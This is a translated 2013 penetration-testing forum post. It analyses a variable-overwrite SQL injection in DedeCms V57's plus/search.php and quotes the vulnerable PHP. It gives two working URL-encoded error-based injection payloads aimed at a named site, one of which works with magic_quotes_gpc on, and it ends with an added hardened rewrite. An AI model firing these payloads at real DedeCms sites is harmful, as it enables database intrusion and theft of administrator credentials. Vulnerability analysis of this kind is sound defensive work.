中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title: DedeCms V57 plus/search.php file SQL injection
Author: admin
Time: 2013-1-19 08:18
Saw this on Weibo and had a look at it. This vulnerability can be exploited in more than one place; in fact it can be exploited even when magic_quotes_gpc = On. It is genuinely not a marginal bug.

Author: c4rp3nt3r@0x50sec.org

The latest DedeCms has a variable-overwrite vulnerability in plus/search.php; successful exploitation yields the administrator's password.

Heige (黑哥) says the hole has already been patched. My fault for not testing it properly, and I never used it to hack any site... But this vulnerability is really good and ought to have some exploitation value. I'll leave the title as it is; since it's patched, it might as well be public.

============

The latest DedeCms has a variable-overwrite vulnerability in plus/search.php; successful exploitation yields the administrator's password.

require_once(dirname(__FILE__)."/../include/common.inc.php");
require_once(DEDEINC."/arc.searchview.class.php");

$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;

if(!isset($orderby)) $orderby='';
else $orderby = preg_replace("#[^a-z]#i", '', $orderby);

if(!isset($searchtype)) $searchtype = 'titlekeyword';
else $searchtype = preg_replace("#[^a-z]#i", '', $searchtype);

if(!isset($keyword)){
    if(!isset($q)) $q = '';
    $keyword=$q;
}

$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));

//look up category info
if(empty($typeid))
{
    $typenameCacheFile = DEDEDATA.'/cache/typename.inc';
    if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
    {
        $fp = fopen(DEDEDATA.'/cache/typename.inc', 'w');
        fwrite($fp, "<"."?php\r\n");
        $dsql->SetQuery("Select id,typename,channeltype From `#@__arctype`");
        $dsql->Execute();
        while($row = $dsql->GetArray())
        {
            fwrite($fp, "\$typeArr[{$row['id']}] = '{$row['typename']}';\r\n");
        }
        fwrite($fp, '?'.'>');
        fclose($fp);
    }
    //include the category cache and check whether the keyword contains a category name
    require_once($typenameCacheFile);
    //the $typeArr array is defined inside the generated temp file that gets included; because of
    //DedeCms's global-variable mechanism, we can define one ourselves
    //
    if(isset($typeArr) && is_array($typeArr))
    {
        foreach($typeArr as $id=>$typename)
        {
            $keywordn = str_replace($typename, ' ', $keyword);   //(highlighted in the original) this is the spot to get past
            if($keyword != $keywordn)
            {
                $keyword = $keywordn;
                $typeid = $id;   //(highlighted in the original) variable overwrite here: it turns the earlier filter
                                 //"$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;" into mere decoration
                break;
            }
        }
    }
}
! q9 M# g2 u. _0 u7 ]5 b y( {
Then, further down, plus/search.php creates an object of the Search class.

In arc.searchview.class.php, the constructor of the SearchView class instantiates a TypeLink:

$this->TypeLink = new TypeLink($typeid);

The TypeLink constructor applies no filtering (the programmer assumed it had already been filtered upstream...) and puts the value straight into the SQL statement.

: m9 v& Y B4 T
class TypeLink
{
    var $typeDir;
    var $dsql;
    var $TypeID;
    var $baseDir;
    var $modDir;
    var $indexUrl;
    var $indexName;
    var $TypeInfos;
    var $SplitSymbol;
    var $valuePosition;
    var $valuePositionName;
    var $OptionArrayList;

    //constructor///////
    //PHP5 constructor
    function __construct($typeid)
    {
        $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];
        $this->indexName = $GLOBALS['cfg_indexname'];
        $this->baseDir = $GLOBALS['cfg_basedir'];
        $this->modDir = $GLOBALS['cfg_templets_dir'];
        $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
        $this->dsql = $GLOBALS['dsql'];
        $this->TypeID = $typeid;
        $this->valuePosition = '';
        $this->valuePositionName = '';
        $this->typeDir = '';
        $this->OptionArrayList = '';

        //load category info
        $query = "SELECT tp.*,ch.typename as ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join `#@__channeltype` ch on ch.id=tp.channeltype WHERE tp.id='$typeid' ";
        //(highlighted in the original) the injection happens here; it obviously needs magic_quotes_gpc = Off.
        //Marginal? Well, at least it doesn't need the member centre.

        if($typeid > 0)
        {
            $this->TypeInfos = $this->dsql->GetOne($query);
            //... (rest of the constructor omitted in the original)
        }
    }
}

Exploit code one: requires magic_quotes_gpc = Off

www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title

This is just one of the exploit payloads... Continuing further down the Search class constructor:

......omitted
$this->TypeID = $typeid;
......omitted

if($this->TypeID=="0"){
    $this->ChannelTypeid=1;
}else{
    $row =$this->dsql->GetOne("SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}");
    //the injection here couldn't care less whether magic_quotes_gpc = On, dear
    //not so marginal now, is it dear...
    $this->ChannelTypeid=$row['channeltype'];
}

Exploit code two: the EXP below can be used successfully even with magic_quotes_gpc = On.

www.political-security.com/plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title

If the database already holds content, things have to be thought through more carefully. I haven't considered it that thoroughly; I analysed it, ran a quick test, and didn't use it to hack any site.
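As an added example (not DedeCms code and not the project's actual patch, which the post does not show), here is how the two spots discussed above would be hardened: the category map is taken from the cache file only and never from a request-supplied global $typeArr, the resolved id is cast to int, and the lookup query binds the id instead of interpolating it. The helper names resolveTypeId and loadTypeInfo are hypothetical, and the "dede_" prefix stands in for DedeCms's "#@__" table-prefix placeholder.

```php
<?php
// Added example, not DedeCms code. Helper names are hypothetical; "dede_" stands in for "#@__".

// Fix 1 (plus/search.php): the category map must come from the cache file only,
// never from a request-registered global $typeArr, and the chosen id is cast to int
// so the earlier is_numeric() check cannot be undone by the later assignment.
function resolveTypeId($keyword, $typeid, $cacheFile)
{
    $typeArr = array();                 // local and empty: no inherited global
    if ($typeid === 0 && is_file($cacheFile)) {
        include $cacheFile;             // the cache file defines $typeArr[id] = 'typename'
        foreach ($typeArr as $id => $typename) {
            if ($typename === '') {
                continue;               // an empty name would match every keyword
            }
            $keywordn = str_replace($typename, ' ', $keyword);
            if ($keywordn !== $keyword) {
                $keyword = $keywordn;
                $typeid  = (int) $id;   // cast: a crafted array key becomes a plain integer
                break;
            }
        }
    }
    return array($keyword, $typeid);
}

// Fix 2 (TypeLink / SearchView): bind the id as an integer instead of interpolating it
// into the SQL string; unquoted interpolation is what made the second query independent
// of magic_quotes_gpc in the first place.
function loadTypeInfo(PDO $db, $typeid)
{
    $sql = 'SELECT tp.*, ch.typename AS ctypename, ch.addtable, ch.issystem'
         . ' FROM dede_arctype tp LEFT JOIN dede_channeltype ch ON ch.id = tp.channeltype'
         . ' WHERE tp.id = :id';
    $st = $db->prepare($sql);
    $st->bindValue(':id', (int) $typeid, PDO::PARAM_INT);
    $st->execute();
    $row = $st->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}
```

With the first fix alone, a typeArr[...] request parameter no longer reaches the lookup, because the function starts from an empty local array; the second fix keeps the query safe even if some other path later hands it a non-numeric id.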